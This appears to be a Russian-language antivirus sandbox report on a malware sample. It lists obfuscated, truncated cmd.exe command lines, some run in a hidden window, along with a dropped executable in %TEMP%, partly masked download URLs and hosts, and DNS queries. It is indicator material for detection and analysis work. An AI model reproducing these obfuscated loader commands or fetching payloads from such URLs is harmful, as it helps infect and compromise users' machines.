Техническая информация
- '<SYSTEM32>\cmd.exe' /c ^fO^r , , /^F ; " delims=fLp tokens= 1 " , ; %Q ; ^In ; ( , , ' ; ft^^yPe ; ^| , ^^finDs^^tR ; ; ^^cm ' , ) , d^O ; %Q, ; ; xhA35I^/^vn^h5j^Y] , ; Z84S/^c " ; , (sE...
- %TEMP%\952.exe
- %TEMP%\952.exe
- 'hk##.com':80
- 'ec####esuits.com':80
- 'mr###ggs.com':80
- 'lg##b.co.uk':80
- 'lg##b.co.uk':443
- http://hk##.com/file/hgWA2l/
- http://www.ec####esuits.com/oElikDNad/
- http://mr###ggs.com/J1fxBvdlL/
- http://lg##b.co.uk/MIaOipON/
- 'lg##b.co.uk':443
- DNS ASK hk##.com
- DNS ASK pa###as.com.br
- DNS ASK ec####esuits.com
- DNS ASK mr###ggs.com
- DNS ASK lg##b.co.uk
- '<SYSTEM32>\cmd.exe' /c ^fO^r , , /^F ; " delims=fLp tokens= 1 " , ; %Q ; ^In ; ( , , ' ; ft^^yPe ; ^| , ^^finDs^^tR ; ; ^^cm ' , ) , d^O ; %Q, ; ; xhA35I^/^vn^h5j^Y] , ; Z84S/^c " ; , (sE...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ft^yPe | ^finDs^tR ^cm
- '<SYSTEM32>\cmd.exe' /S /D /c" ftyPe "
- '<SYSTEM32>\findstr.exe' cm
- '<SYSTEM32>\cmd.exe' , ; ; xhA35I/vnh5jY] , ; Z84S/c " ; , (sE^t ^ ^ ^}{=p^@^ZMI$O1L^)s^\B^-Sk^=/C.l}y{5^q:cv^TN^g^'m^rU ^xRji^YD^(+now^F^ef^J^Q^E^;^2^thub9dA,aWP)& , ; ^for ; %^e , , ^iN ; (^ -0 , +46...